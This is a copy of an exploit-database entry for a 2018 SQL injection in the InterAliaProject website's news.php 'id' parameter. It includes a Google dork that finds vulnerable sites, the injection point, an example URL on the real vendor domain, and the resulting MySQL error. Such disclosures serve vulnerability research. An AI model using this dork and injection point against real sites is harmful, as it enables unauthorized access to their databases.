Advertisement






© Inter Alia 2013 InterAliaProject Web Design SQL Injection Vulnerability

CVE Category Price Severity
CWE-89
Author Risk Exploitation Type Date
Inter Alia Project Remote 2018-09-07
CPE
cpe:cpe:/a:interalia_project:web_design
CVSS EPSS EPSSP
Not available 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018090067

Below is a copy:

Inter Alia 2013 InterAliaProject Web Design SQL Injection Vulnerability
#################################################################################################

# Exploit Title :  Inter Alia 2013 InterAliaProject Web Design SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 07/09/2018
# Vendor Homepage : interaliaproject.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Description : 

- InterAliaProject - To bring people closer to each other and to Europe through breaking stereotypes, analysing and deconstructing conflict, engaging actively in key political issues and dialogue.

- To raise awareness of the EU & prospective EU citizens on available channels for acting, participating & shaping Europe

- To utilize the increasing willingness of the European youth to share their skills, expertise and energy, and to improve youth employability

- To apply pressure to EU mechanisms for the expansion of participation of EU & prospective EU citizens in the European process

- To provide multi-disciplinary approaches and integrate fragmented knowledge into a fruitful scheme

# Google Dork  : intext:'' Inter Alia 2013''

# Exploit : /news.php?id=[SQL Injection]

#################################################################################################

# Example Site => interaliaproject.com/news.php?id=115%27 => [ Proof of Concept ] => archive.is/1Rqb6

# SQL Database Error => 

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/interali/public_html/news.php on line 71

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum